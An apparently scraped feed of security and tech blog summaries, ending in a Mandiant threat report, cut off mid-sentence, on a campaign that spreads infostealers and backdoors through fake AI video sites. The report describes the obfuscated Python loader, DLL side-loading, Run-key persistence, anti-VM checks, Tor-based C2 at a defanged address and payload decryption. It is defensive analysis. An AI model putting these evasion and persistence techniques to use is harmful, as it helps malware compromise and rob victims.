the root of every experience is the customer data.  Customer data management is done in a variety of ways within an organization, even within individual lines of business. CRMs are often used to capture information for preference management, CDPs (customer data platforms) are used for website tracking and personalization, often missing the full omnichannel experience tracking. Marketing automation has included lightweight CRMs which are evolving to CDPs but are sometimes just their own database specific to their content-focused used cases. Campaign management is often separate as well, holding its own set of data used for personalizing campaigns and understanding customer behavior within them. Journey management solutions also have a unique set of data not stored elsewhere around the events, actions and behaviors, both planned and reality, that reflect customer interactions. Segmentation is another function that is often solved through custom scripting or home-grown systems or is embedded within other marketing systems but holds valuable insights.  The result is a vast system of siloed data sources that customer experience executives and communication centers of excellence (COE) see a need to address, but it requires a level of attention and effort to sort through. At best, go forward efforts such as zero copy policies helps reduce complexity, but can slow down adoption of new technologies.  Adding more complexity are AI and LLMs. Generative or Content AI is really where many communications and data tools have focused to generate or tweak content. However, concerns around intellectual property can limit how organizations want to use these tools. In communications management, assisting content creators to craft messages has shown some value, but is only the tip of the iceberg of the potential value AI can provide to communications experiences. The more data available to be fed into an LLM, the more we can leverage other AI variations such as Insights AI and Responsive AI, which have the potential to analyze the vast amount of data available in these siloed systems and make recommendations for improving customer experiences from individual touch points to the overall sentiment of the business relationship.  Knowing that this data exists today within organizations but in disparate systems is a good problem to start with. Many have attempted to solve this through business process management/automation and integration, but that approach can create complexities of its own. Aggregating all of this data to persist in a single, centralized database is an unrealistic effort that will get shut down by every CIO and IT department. So, how can we address this?  The first step is understanding where this data exists today. A few questions to ask… What systems exist and where? What type of data is stored in these systems? Is it usable? Is it actionable? Where and when is it used and to what extent? For example, can it be used for personalization of content within a communication, personalization of an experience touchpoint or automating orchestration follow ups?  Once you begin to understand the complexity of your organization’s data infrastructure and the valuable data it holds, you open the door to the opportunity to connect these systems with a customer data solution that can provide a powerful, complete view of the customer that is both actionable and insightful.  The work is not done yet. Understanding the personas who need to use this data, creating a data governance strategy and aligning key stakeholders are also critical steps to success. What are the desired outcomes and their respective priorities of this data once it’s aggregated, normalized, analyzed and able to provide a more complete view of your customers and their behaviors? This goldmine of data is powerful and desirable, so having clear priorities is key.  As we know in customer communications, data is sensitive and must be protected but can provide powerful insights that can improve business outcomes and enhance personalized experiences when used correctly. New solutions are becoming readily available that are approaching disparate enterprise data systems with a different approach that does not require ripping out the existing infrastructure. It is important to remember that the software and solutions are only as good as the strategy that is driving the ROI and outcomes of centralizing customer data.  The post Is your customer data ready for CX transformation? appeared first on OpenText Blogs.

https://blogs.opentext.com/is-your-customer-data-ready-for-cx-transformation/
Get To Know Graylog GO
2025-05-27T13:00:35Z | 1748350835

Topic Ideas We welcome proposals from Graylog Security and Enterprise customers and Graylog open source users. You don’t need to be a professional speaker—just someone with a story worth telling. Example topics include: Customer success stories Traditional or unique use cases Upgrading from open source to Graylog Enterprise or Graylog Security Migration to Graylog 6.1 […] The post Get To Know Graylog GO appeared first on Graylog.

https://graylog.org/post/get-to-know-graylog-go/
Arlie: What AI in IT Was Meant to Be
2025-05-27T13:00:00Z | 1748350800

Commvault’s AI-powered assistant is scalable, secure, accurate, and adaptive. The post Arlie: What AI in IT Was Meant to Be appeared first on Commvault - English - United States.

https://www.commvault.com/blogs/arlie-what-ai-in-it-was-meant-to-be
Protecting Firewall Capacity from DDoS and Other Threats
2025-05-27T13:00:00Z | 1748350800

Firewalls are important network devices for security and other applications. They help filter traffic based on specific criteria to prevent illegitimate users from accessing the network. They are not, however, designed specifically for distributed denial-of-service (DDoS) protection. Many networks suffer from...

https://www.netscout.com/blog/protecting-firewall-capacity-ddos-and-other-threats
Newsletter Nacionalnog CERT-a CERT-info #5
2025-05-27T12:23:37Z | 1748348617

Pročitajte novi broj Newslettera Nacionalnog CERT-a. Tema mjeseca: Zaštita korisničkog računa U svibanjskom izdanju newslettera donosimo vam pregled materijala koje smo izradili samostalno, a obuhvaćaju sve – od zaštite korisničkih računa do kibernetičke higijene u radu kod kuće. Hvala što ste dio naše zajednice. Radujemo se što ćemo s vama dijeliti zanimljive priče i korisne... The post Newsletter Nacionalnog CERT-a CERT-info #5 first appeared on CERT.hr.

https://www.cert.hr/newsletter-nacionalnog-cert-a-cert-info-5/
Spotlight On: #OT4Good in Bengaluru
2025-05-27T12:21:20Z | 1748348480

At OpenText, we believe in taking steps to support a more sustainable and fair future. Our employees are at the heart of this effort, dedicating their time and energy to making a lasting impact in their communities. Whether volunteering their time with the help of three paid volunteer days each year or fundraising for global causes, OpenTexters across the globe are committed to creating positive change. At OpenText we call this: #OT4Good.   In this blog post, we shine a spotlight on the employee-led initiatives in Bengaluru, India, that are helping to drive progress in education and climate action.   Spreading Joy with Every Kit  In July 2024, the OpenText Bengaluru office partnered with Youth for Seva, a nation-wide movement that inspires youth to volunteer and drive positive change. OpenText sponsored approximately 950 school kits, each containing essentials like backpacks, books, and stationary products. High school kits also included a geometry box, while nursery kits featured colored pencils in addition to their books.  Our employee volunteers helped assemble and distribute the kits across four schools in Bengaluru city.   “It was an incredible opportunity to volunteer with Youth for Seva. Our team felt a great sense of fulfillment and joy knowing that we could make a difference in the lives of so many youth and children that will hopefully have a lasting impact and inspire them to give back to society as they grow up and accomplish great things.” – Moby Stationery Drive with Samarthanam Trust for the Disabled  As the school year began in Bengaluru, our volunteers organized a drive to collect unused stationery materials, gently used clothing and toys for families in need. They then visited Samarthanam Trust for the Disabled to distribute the donations and spend time with the children.  “Our collective efforts have reached the hearts of 350 children at Samarthanam Trust. The entire OpenText Bengaluru family united to contribute and deliver over 23 cartons filled with stationery, toys, and clothes. The meaningful impact we've made fills us with immense pride and gratitude. This experience reminds us of the transformative power of kindness and teamwork.” - Amudha  Tree Planting Drive  In October, OpenText India partnered with United Way of Bengaluru for a tree planting drive as part of the Sidlaghatta Social Forestry project, located in the outskirts of the city.  Sixty passionate OpenText volunteers gathered to dig the pits, add manure, and carefully plant and water each sapling, resulting in 200 saplings successfully planted that day!  This project was chosen by our team to fulfill a long-term vision: reforesting 100 acres of land while supporting local families through future fruit sales. This initiative will help restore green cover and strengthen the livelihoods of nearby villages.  “Sustainability reflects the core values of responsibility and innovation that we embrace at OpenText. It’s fulfilling to be part of an organization that prioritizes creating a positive environmental impact.” - Gaurav  “I chose to participate in the event because I deeply believe that each of us has a role to play in protecting and preserving the environment. Taking small, proactive steps today can lead to a more sustainable future. Beyond the cause itself, the event also offered a unique chance to interact with my colleagues in a more relaxed and meaningful setting, strengthening our sense of community and shared purpose.” - Pushpanjali At OpenText, our employees recognize the importance of giving back to the communities where they live and work. Over the past months, the OpenText team in Bengaluru focused their impact on quality education, aiding the well-being of underprivileged students, and supporting the environment around us. If you want to learn more about life at OpenText, visit our careers page at careers.opentext.com.   The post Spotlight On: #OT4Good in Bengaluru  appeared first on OpenText Blogs.

https://blogs.opentext.com/spotlight-on-employee-volunteering-in-bengaluru/
The 90-5-5 Concept: Your Key to Solving Human Risk in Cybersecurity
2025-05-27T12:00:19Z | 1748347219

Most breaches are caused by everyday human mistakes. The 90-5-5 Concept is a framework that addresses this by shifting the conversation to proactive design.

https://blogs.cisco.com/security/the-90-5-5-concept-your-key-to-solving-human-risk-in-cybersecurity/
Russian Hackers Breach 20+ NGOs Using Evilginx Phishing via Fake Microsoft Entra Pages
2025-05-27T11:51:00Z | 1748346660

Microsoft has shed light on a previously undocumented cluster of malicious activity originating from a Russia-affiliated threat actor dubbed Void Blizzard (aka Laundry Bear) that it said is attributed to "worldwide cloud abuse." Active since at least April 2024, the hacking group is linked to espionage operations mainly targeting organizations that are important to Russian government objectives,...

https://thehackernews.com/2025/05/russian-hackers-breach-20-ngos-using.html
AI Agents and the Non‑Human Identity Crisis: How to Deploy AI More Securely at Scale
2025-05-27T11:00:00Z | 1748343600

Artificial intelligence is driving a massive shift in enterprise productivity, from GitHub Copilot’s code completions to chatbots that mine internal knowledge bases for instant answers. Each new agent must authenticate to other services, quietly swelling the population of non‑human identities (NHIs) across corporate clouds. That population is already overwhelming the enterprise: many companies...

https://thehackernews.com/2025/05/ai-agents-and-nonhuman-identity-crisis.html
Hackers are abusing Microsoft email notifications to target enterprises
2025-05-27T10:51:12Z | 1748343072

Researchers have uncovered a hybrid email-and-phone scam based on fake Microsoft billing emails

https://www.itpro.com/security/cyber-attacks/hackers-are-abusing-microsoft-business-notifications-to-target-enterprises
The Privacy-Friendly Tech to Replace Your US-Based Email, Browser, and Search
2025-05-27T10:30:00Z | 1748341800

Thanks to drastic policy changes in the US and Big Tech’s embrace of the second Trump administration, many people are moving their digital lives abroad. Here are a few options to get you started.

https://www.wired.com/story/the-privacy-friendly-tech-to-replace-your-us-based-email-browser-and-search/
DragonForce actors target SimpleHelp vulnerabilities to attack MSP, customers
2025-05-27T10:00:02Z | 1748340002

Ransomware actor exploited RMM to access multiple organizations; Sophos EDR blocked encryption on customer’s network

https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/
DragonForce actors target SimpleHelp vulnerabilities to attack MSP, customers
2025-05-27T10:00:02Z | 1748340002

Ransomware actor exploited RMM to access multiple organizations; Sophos EDR blocked encryption on customer’s network

https://news.sophos.com/en-us/2025/05/27/dragonforce-actors-target-simplehelp-vulnerabilities-to-attack-msp-customers/
New Russia-affiliated actor Void Blizzard targets critical sectors for espionage
2025-05-27T09:45:00Z | 1748339100

Microsoft Threat Intelligence has discovered a cluster of worldwide cloud abuse activity conducted by a threat actor we track as Void Blizzard, who we assess with high confidence is Russia-affiliated and has been active since at least April 2024. Void Blizzard’s cyberespionage operations tend to be highly targeted at specific organizations of interest to Russia, including in government, defense, transportation, media, non-governmental organizations (NGOs), and healthcare sectors primarily in Europe and North America. The post New Russia-affiliated actor Void Blizzard targets critical sectors for espionage appeared first on Microsoft Security Blog.

https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/
A cybersecurity researcher just discovered a treasure trove of leaked accounts: More than 184 million logins were readily available online, with Google, Meta, and Apple users affected
2025-05-27T09:35:00Z | 1748338500

The mysterious database contains highly sensitive data that appears to have been harvested by infostealer malware

https://www.itpro.com/business/a-cybersecurity-researcher-just-discovered-a-treasure-trove-of-leaked-accounts-more-than-184-million-logins-were-readily-available-online-with-google-meta-and-apple-users-affected
Word to the wise: Beware of fake Docusign emails
2025-05-27T09:00:00Z | 1748336400

Cybercriminals impersonate the trusted e-signature brand and send fake Docusign notifications to trick people into giving away their personal or corporate data

https://www.welivesecurity.com/en/scams/personal-data-fraudsters-docusign-scam-emails/
SAP and Alibaba Group Partner to Accelerate Cloud Transformation
2025-05-27T08:30:00Z | 1748334600

MADRID — Together, the companies will help joint customers drive innovation, improve operational performance and create new competitive advantages.

https://news.sap.com/2025/05/sap-alibaba-group-partner-accelerate-cloud-transformation/
Achieving PCI DSS v4.0.1 Certification: A Comprehensive Overview of Cato Networks’ PCI Journey
2025-05-27T07:55:46Z | 1748332546

Executive Summary  As previously noted, we achieved PCI DSS v4.0.1 compliance certification, becoming the first SASE platform provider to do so. This milestone reflects our commitment to the highest security standards, ensuring enhanced protection for sensitive data. Throughout the assessment, we collaborated with an external Qualified Security Assessor (QSA) from USD AG to ensure all... The post Achieving PCI DSS v4.0.1 Certification: A Comprehensive Overview of Cato Networks’ PCI Journey  appeared first on Cato Networks.

https://www.catonetworks.com/blog/achieving-pci-dss-v4-0-1-certification/
The edge devices security risk: What leaders can do
2025-05-27T07:30:00Z | 1748331000

Compromised network edge devices are one of the biggest attack points for small and medium businesses

https://www.itpro.com/security/edge-devices-security-risk-leaders-do
The EU balancing act: Is data privacy overtaking transparency?
2025-05-27T07:13:57Z | 1748330037

Finding the balance between transparency and personal data protection has been a constant challenge for governments and regulators across Europe. This has been starkly highlighted over the last three years by legal challenges regarding beneficial ownership registers and debates over press freedom. Having a deep understanding of the extent, quality and availability of information in European jurisdictions is an important element of S-RM’s work. There are two key areas in which S-RM has witnessed shifts in attitude and approach from greater transparency towards the prioritisation of privacy. In this article, Alice Norman examines recent developments in public access to beneficial ownership registers and the ongoing debate across Europe over restrictions on journalistic investigations and the right to information.

https://www.s-rminform.com/latest-thinking/the-eu-balancing-act-is-data-privacy-overtaking-transparency
Agentic AI poised to handle 68% of customer service and support interactions by 2028
2025-05-27T07:00:00Z | 1748329200

New Cisco research reveals overwhelming demand for Agentic AI to transform the way technology vendors deliver Customer ExperienceMore RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/blog-agentic-ai-poised-to-handle-68-of-customer-service-and-support-interactions-by-2028.html
Agentic AI Poised to Handle 68% of Customer Service and Support Interactions by 2028
2025-05-27T07:00:00Z | 1748329200

Cisco research reveals accelerated demand for agentic-AI led customer experience, with 68% of interactions expected to be handled by agentic AI by 2028.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/agentic-ai-poised-to-handle-68-of-customer-service-and-support-interactions-by-2028.html
Agentic AI Poised to Handle 68% of Customer Service and Support Interactions by 2028
2025-05-27T07:00:00Z | 1748329200

Cisco research reveals accelerated demand for agentic-AI led customer experience, with 68% of interactions expected to be handled by agentic AI by 2028.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m05/agentic-ai-poised-to-handle-68-of-customer-service-and-support-interactions-by-2028.html
SAP Introduces New SAP Business Suite Acceleration Program with Microsoft Cloud
2025-05-27T07:00:00Z | 1748329200

The program provides customers with a smooth path to next-generation SAP Cloud ERP solutions delivered through our global partner ecosystem.

https://news.sap.com/2025/05/new-sap-business-suite-acceleration-program-microsoft-cloud/
Team Liquid Unlocking the Next Level with AI Agents
2025-05-27T07:00:00Z | 1748329200

MADRID — Joule Agents offer instant access to game statistics, player performance trends and strategic comparisons using natural language.

https://news.sap.com/2025/05/team-liquid-unlocking-next-level-ai-agents/
Amer Sports Makes Strategic Play with SAP S/4HANA Cloud
2025-05-27T07:00:00Z | 1748329200

MADRID — The global group of iconic sports and outdoor brands has embarked on a journey to accelerate digital transformation.

https://news.sap.com/2025/05/amer-sports-strategic-play-sap-s4hana-cloud/
CAF Drives Digital Transformation with Cloud Solutions from SAP
2025-05-27T07:00:00Z | 1748329200

MADRID — CAF is on a digital transformation journey to a sustainable and efficient manufacturing process.

https://news.sap.com/2025/05/caf-drives-digital-transformation-cloud-solutions-sap/
BASF Embarks on Digital Transformation with SAP S/4HANA Cloud
2025-05-27T07:00:00Z | 1748329200

MADRID — The longtime SAP customer has adopted a hybrid system landscape to reduce the complexity of on-premises management.

https://news.sap.com/2025/05/basf-digital-transformation-sap-s4hana-cloud/
The Sharp Taste of Mimo’lette: Analyzing Mimo’s Latest Campaign targeting Craft CMS
2025-05-27T07:00:00Z | 1748329200

This article on was originally distributed as a private report to our customers. Introduction Once upon a time, in the land of the CMS honeypot, a curious threat named Mimo crept silently through the digital woods. Unlike your typical fairytale villain, Mimo didn’t leave glass slippers—just suspicious payloads. Between February 28 and May 2, multiple […] La publication suivante The Sharp Taste of Mimo’lette: Analyzing Mimo’s Latest Campaign targeting Craft CMS est un article de Sekoia.io Blog.

https://blog.sekoia.io/the-sharp-taste-of-mimolette-analyzing-mimos-latest-campaign-targeting-craft-cms/
Cato IoT/OT Security
2025-05-27T06:40:51Z | 1748328051

The post Cato IoT/OT Security appeared first on Cato Networks.

https://www.catonetworks.com/resources/cato-iot-ot-security-webinar/
Five-Time Leader in Gartner Integration Platform-as-a-Service Magic Quadrant: Why Customers Trust SAP Integration Suite
2025-05-27T06:00:00Z | 1748325600

SAP Integration Suite is a trusted solution for organizations seeking to standardize on a single integration technology.

https://news.sap.com/2025/05/five-time-leader-gartner-magic-quadrant-ipaas-sap-integration-suite/
Text-to-Malware: How Cybercriminals Weaponize Fake AI-Themed Websites
2025-05-27T05:00:00Z | 1748322000

Written by: Diana Ion, Rommel Joven, Yash Gupta Since November 2024, Mandiant Threat Defense has been investigating an UNC6032 campaign that weaponizes the interest around AI tools, in particular those tools which can be used to generate videos based on user prompts. UNC6032 utilizes fake “AI video generator” websites to distribute malware leading to the deployment of payloads such as Python-based infostealers and several backdoors. Victims are typically directed to these fake websites via malicious social media ads that masquerade as legitimate AI video generator tools like Luma AI, Canva Dream Lab, and Kling AI, among others. Mandiant Threat Defense has identified thousands of UNC6032-linked ads that have collectively reached millions of users across various social media platforms like Facebook and LinkedIn. We suspect similar campaigns are active on other platforms as well, as cybercriminals consistently evolve tactics to evade detection and target multiple platforms to increase their chances of success.  Mandiant Threat Defense has observed UNC6032 compromises culminating in the exfiltration of login credentials, cookies, credit card data, and Facebook information through the Telegram API. This campaign has been active since at least mid-2024 and has impacted victims across different geographies and industries. Google Threat Intelligence Group (GTIG) assesses UNC6032 to have a Vietnam nexus.  Mandiant Threat Defense acknowledges Meta's collaborative and proactive threat hunting efforts in removing the identified malicious ads, domains, and accounts. Notably, a significant portion of Meta’s detection and removal began in 2024, prior to Mandiant alerting them of additional malicious activity we identified. A similar investigation was recently published by Morphisec. Campaign Overview Threat actors haven't wasted a moment capitalizing on the global fascination with Artificial Intelligence. As AI's popularity surged over the past couple of years, cybercriminals quickly moved to exploit the widespread excitement. Their actions have fueled a massive and rapidly expanding campaign centered on fraudulent websites masquerading as cutting-edge AI tools. These websites have been promoted by a large network of misleading social media ads, similar to the ones shown in Figure 1 and Figure 2. Figure 1: Malicious Facebook ads Figure 2: Malicious LinkedIn ads As part of Meta’s implementation of the Digital Services Act, the Ad Library displays additional information (ad campaign dates, targeting parameters and ad reach) on all ads that target people from the European Union. LinkedIn has also implemented a similar transparency tool. Our research through both Ad Library tools identified over 30 different websites, mentioned across thousands of ads, active since mid 2024, all displaying similar ad content. The majority of ads which we found ran on Facebook, with only a handful also advertised on LinkedIn. The ads were published using both attacker-created Facebook pages, as well as by compromised Facebook accounts. Mandiant Threat Defense performed further analysis of a sample of over 120 malicious ads and, from the EU transparency section of the ads, their total reach for EU countries was over 2.3 million users. Table 1 displays the top 5 Facebook ads by reach. It should be noted that reach does not equate to the number of victims. According to Meta, the reach of an ad is an estimated number of how many Account Center accounts saw the ad at least once. Ad Library ID Ad Start Date Ad End Date EU Reach 1589369811674269 14.12.2024 18.12.2024 300,943 559230916910380 04.12.2024 09.12.2024 298,323 926639029419602 07.12.2024 09.12.2024 270,669 1097376935221216 11.12.2024 12.12.2024 124,103 578238414853201 07.12.2024 10.12.2024 111,416 Table 1: Top 5 Facebook ads by reach The threat actor constantly rotates the domains mentioned in the Facebook ads, likely to avoid detection and account bans. We noted that once a domain is registered, it will be referenced in ads within a few days if not the same day. Moreover, most of the ads are short lived, with new ones being created on a daily basis.  On LinkedIn, we identified roughly 10 malicious ads, each directing users to hxxps://klingxai[.]com. This domain was registered on September 19, 2024, and the first ad appeared just a day later. These ads have a total impression estimate of 50k-250k. For each ad, the United States was the region with the highest percentage of impressions, although the targeting included other regions such as Europe and Australia. Ad Library ID Ad Start Date Ad End Date Total Impressions % Impressions in the US 490401954 20.09.2024 20.09.2024 <1k 22 508076723 27.09.2024 28.09.2024 10k-50k 68 511603353 30.09.2024 01.10.2024 10k-50k 61 511613043 30.09.2024 01.10.2024 10k-50k 40 511613633 30.09.2024 01.10.2024 10k-50k 54 511622353 30.09.2024 01.10.2024 10k-50k 36 Table 2: LinkedIn ads From the websites investigated, Mandiant Threat Defense observed that they have similar interfaces and offer purported functionalities such as text-to-video or image-to-video generation. Once the user provides a prompt to generate a video, regardless of the input, the website will serve one of the static payloads hosted on the same (or related) infrastructure.  The payload downloaded is the STARKVEIL malware. It drops three different modular malware families, primarily designed for information theft and capable of downloading plugins to extend their functionality. The presence of multiple, similar payloads suggests a fail-safe mechanism, allowing the attack to persist even if some payloads are detected or blocked by security defences. In the next section, we will delve deeper into one particular compromise Mandiant Threat Defense responded to. Luma AI Investigation Infection Chain Figure 3: Infection chain lifecycle This blog post provides a detailed analysis of our findings on the key components of this campaign: Lure: The threat actors leverage social networks to push AI-themed ads that direct users to fake AI websites, resulting in malware downloads. Malware: It contains several malware components, including the STARKVEIL dropper, which deploys the XWORM and FROSTRIFT backdoors and the GRIMPULL downloader. Execution: The malware makes extensive use of DLL side-loading, in-memory droppers, and process injection to execute its payloads. Persistence: It uses AutoRun registry key for its two Backdoors (XWORM and FROSTRIFT). Anti-VM and Anti-analysis: GRIMPULL checks for commonly used artifacts\features from known Sandbox and analysis tools. Reconnaissance  Host reconnaissance: XWORM and FROSTRIFT survey the host by collecting information, including OS, username, role, hardware identifiers, and installed AV. Software reconnaissance: FROSTRIFT checks the existence of certain messaging applications and browsers. Command-and-control (C2) Tor: GRIMPULL utilizes a Tor Tunnel to fetch additional .NET payloads. Telegram: XWORM sends victim notification via telegram including information gathered during host reconnaissance. TCP: The malware connects to its C2 using ports 7789, 25699, 56001. Information stealer  Keylogger: XWORM log keystrokes from the host. Browser extensions: FROSTRIFT scans for 48 browser extensions related to Password managers, Authenticators, and Digital wallets potentially for data theft. Backdoor Commands: XWORM supports multiple commands for further compromise. The Lure This particular case began from a Facebook Ad for “Luma Dream AI Machine”, masquerading as a well-known text-to-video AI tool - Luma AI. The ad, as seen in Figure 4, redirected the user to an attacker-created website hosted at hxxps://lumalabsai[.]in/. Figure 4: The ad the victim clicked on Once on the fake Luma AI website, the user can click the “Start Free Now” button and choose from various video generation functionalities. Regardless of the selected option, the same prompt is displayed, as shown in the GIF in Figure 5.  This multi-step process, made to resemble any other legitimate text-to-video or image-to-video generation tool website, creates a sense of familiarity to the user and does not give any immediate indication of malicious intent. Once the user hits the generate button, a loading bar appears, mimicking an AI model hard at work. After a few seconds, when the new video is supposedly ready, a Download button is displayed. This leads to the download of a ZIP archive file on the victim host. Figure 5: Fake AI video generation website Unsurprisingly, the ready-to-download archive is one of many payloads already hosted on the same server, with no connection to the user input. In this case, several archives were hosted at the path hxxps://lumalabsai[.]in/complete/. Mandiant determined that the website will serve the archive file with the most recent “Last Modified” value, indicating continuous updates by the threat actor. Mandiant compared some of these payloads and found them to be functionally similar, with different obfuscation techniques applied, thus resulting in different sizes. Figure 6: Payloads hosted at hxxps://lumalabsai[.]in/complete Execution The previously downloaded ZIP archive contains an executable with a double extension (.mp4 and .exe) in its name, separated by thirteen Braille Pattern Blank (Unicode: U+2800, UTF-8: E2 A0 80) characters. This is a special whitespace character from the Braille Pattern Block in Unicode. Figure 7: Braille Pattern Blank characters in the file name The resulting file name, Lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe, aims to make the binary less suspicious by pushing the .exe extension out of the user view. The number of Braille Pattern Blank characters used varies across different samples served, ranging from 13 to more than 30. To further hide the true purpose of this binary, the default .mp4 Windows icon is used on the malicious file. Figure 8 shows how the file looks on Windows 11, compared to a legitimate .mp4 file. Figure 8: Malicious binary vs legitimate .mp4 file STARKVEIL The binary Lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe, tracked by Mandiant as STARKVEIL, is a dropper written in Rust. Once executed, it extracts an embedded archive containing benign executables and its malware components. These are later utilized to inject malicious code into several legitimate processes.  Executing the malware displays an error window, as seen in Figure 9, to trick the user into trying to execute it again and into believing that the file is corrupted. Figure 9: Error window displayed when executing STARKVEIL For a successful compromise, the executable needs to run twice; the initial execution results in the extraction of all the embedded files under the C:\winsystem\ directory. Figure 10: Files in the winsystem directory During the second execution, the main executable spawns the Python Launcher, py.exe, with an obfuscated Python command as an argument. The Python command decodes an embedded Python code, which Mandiant tracks as COILHATCH dropper. COILHATCH performs the following actions (note that the script has been deobfuscated and renamed for improved readability): The command takes a Base85-encoded string, decodes it, decompresses the result using zlib, deserializes the resulting data using the marshal module, and then executes the final deserialized data as Python code. Figure 11: Python command The decompiled first-stage Python code combines RSA, AES, RC4, and XOR techniques to decrypt the second stage Python bytecode. Figure 12: First-stage Python The decrypted second-stage Python script executes C:\winsystem\heif\heif.exe, which is a legitimate, digitally signed executable, used to side-load a malicious DLL. This serves as the launcher to execute the other malware components. Figure 13: Second-stage Python The following is the resulting process tree: explorer.exe ↳ 7zfm.exe "\Lumalabs_1926326251082123689-626.zip" ↳ "\lumalabs_1926326251082123689-626.mp4⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀.exe" ↳ "C:\winsystem\py\py.exe" -c exec(__import__ ....) ↳ "C:\WINDOWS\system32\cmd.exe" /c "C:\winsystem\heif\heif.exe" ↳ "C:\winsystem\heif\heif.exe" Malware Analysis As mentioned, the STARKVEIL malware drops its components during its first execution and executes a launcher on its second execution. The complete analysis of all the malware components and their roles is provided in the next sections. Directory Benign File Side-Loaded DLL Role (Malware) C:\winsystem\heif heif.exe heif.dll (SHA256: 839260ac321a44da55d4e6a5130c12869066af712f71c558bd42edd56074265b) Launcher %APPDATA%\Launcher Launcher.exe libde265.dll (SHA256: 4982a33e0c2858980126b8279191cb4eddd0a35f936cf3eda079526ba7c76959) Persistence %APPDATA%\python python.exe avcodec-61.dll (SHA256: 8d2c9c2b5af31e0e74185a82a816d3d019a0470a7ad8f5c1b40611aa1fd275cc) Downloader (GRIMPULL) %APPDATA%\pythonw pythonw.exe heif.dll (SHA256: a0e75bd0b0fa0174566029d0e50875534c2fcc5ba982bd539bdeff506cae32d3) Backdoor executed at runtime (XWORM) C:\winsystem\heif-info heif-info.exe heif.dll (SHA256: 1a037da4103e38ff95cb0008a5e38fd6a8e7df5bc8e2d44e496b7a5909ddebeb) Backdoor for persistence (XWORM) %APPDATA%\ffplay ffplay.exe libde265.dll (SHA256: dcb1e9c6b066c2169928ae64e82343a250261f198eb5d091fd7928b69ed135d3) Backdoor executed at runtime (FROSTRIFT) C:\winsystem\heif2rgb heif2rgb.exe heif.dll (SHA256: e663c1ba289d890a74e33c7e99f872c9a7b63e385a6a4af10a856d5226c9a822) Backdoor for persistence (FROSTRIFT) Table 3: Malware components Each of these DLLs operates as an in-memory dropper and spawns a new victim process to perform code injection through process replacement. Launcher The execution of C:\winsystem\heif\heif.exe results in the side-loading of the malicious heif.dll, located in the same directory. This DLL is an in-memory dropper that spawns a legitimate Windows process (which may vary) and performs code injection through process replacement. The injected code is a .NET executable that acts as a launcher and performs the following: Moves multiple folders from C:\winsystem to %APPDATA%. The destination folders are: %APPDATA%\python %APPDATA%\pythonw %APPDATA%\ffplay %APPDATA%\Launcher Launches three legitimate processes to side-load associated malicious DLLs. The malicious DLLs for each process are: python.exe: %APPDATA%\python\avcodec-61.dll pythonw.exe: %APPDATA%\pythonw\heif.dll ffplay.exe: %APPDATA%\ffplay\libde265.dll Establishes persistence via AutoRun registry key. value: Dropbox key: SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ root: HKCU\ value data: "cmd.exe /c \"cd /d "" && "Launcher.exe"" Figure 14: Main function of launcher The AutoRun Key executes %APPDATA%\Launcher\Launcher.exe that sideloads the DLL file libde265.dll. This DLL spawns and injects its payload into AddInProcess32.exe via PE hollowing. The injected code’s main purpose is to execute the legitimate binaries C:\winsystem\heif2rgb\heif2rgb.exe and C:\winsystem\heif-info\heif-info.exe, which, in turn, sideload the backdoors XWORM and FROSTRIFT, respectively. GRIMPULL Of the three executables, the launcher first executes %APPDATA%\python\python.exe, which side-loads the DLL avcodec-61.dll and injects the malware GRIMPULL into a legitimate Windows process.  GRIMPULL is a .NET-based downloader that incorporates anti-VM capabilities and utilizes Tor for C2 server connections. Anti-VM and Anti-Analysis  GRIMPULL begins by checking for the presence of the mutex value aff391c406ebc4c3, and terminates itself if this is found. Otherwise, the malware proceeds to perform further anti-VM checks, exiting in case any of the mentioned checks succeeds. Anti-VM and Anti-Analysis Checks Module Detection Checks for sandbox/analysis tool DLLs: SbieDll.dll (Sandboxie) cuckoomon.dll (Cuckoo Sandbox) BIOS Information Checks Queries Win32_BIOS via WMI and checks version and serial number for: VMware VIRTUAL A M I (AMI BIOS) Xen Parent Process Check Checks if parent process is cmd (command line) VM File Detection Checks for existence of vmGuestLib.dll in the System folder System Manufacturer Checks Queries Win32_ComputerSystem via WMI and checks manufacturer and model for: Microsoft (Hyper-V) VMWare Virtual Display and System Configuration Checks Checks for specific screen resolutions: 1440x900 1024x768 1280x1024 Checks if the OS is 32-bit Username Checks Checks for common analysis environment usernames: john anna Any username containing xxxxxxxx Table 4: Anti-VM and Anti-analysis checks Download Function GRIMPULL verifies the presence of a Tor process. If a Tor process is not detected, it proceeds to download, decompress, and execute Tor from the following URL: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/ tor-expert-bundle-windows-i686-13.0.9.tar.gz Figure 15: Download function Afterwards, Tor will run locally on port 9050. C2 Communication GRIMPULL then attempts to connect to the following C2 server via the Tor tunnel over TCP. strokes[.]zapto[.]org:7789 The malware maintains this connection and periodically checks for .NET payloads. Fetched payloads are decrypted using TripleDES in ECB mode with the MD5 hash of the campaign ID aff391c406ebc4c3 as the decryption key, decompressed with GZip (using a 4-byte length prefix), reversed, and then loaded into memory as .NET assemblies. Malware Configuration The configuration elements are encoded as base64 strings, as shown in Figure 16. Figure 16: Encoded malware configuration Table 5 shows the extracted malware configuration. GRIMPULL Malware Configuration C2 domain/server strokes[.]zapto[.]org Port number 7789 Unique identifier/campaign ID  aff391c406ebc4c3 Configuration profile name Default Table 5: GRIMPULL configuration XWORM Secondly, the launcher executes the file %APPDATA%\pythonw\pythonw.exe, which side-loads the DLL heif.dll and injects XWORM into a legitimate Windows process. XWORM is a .NET-based backdoor that communicates using a custom binary protocol over TCP. Its core functionality involves expanding its capabilities through a plugin management system. Downloaded plugins are written to disk and executed. Supported 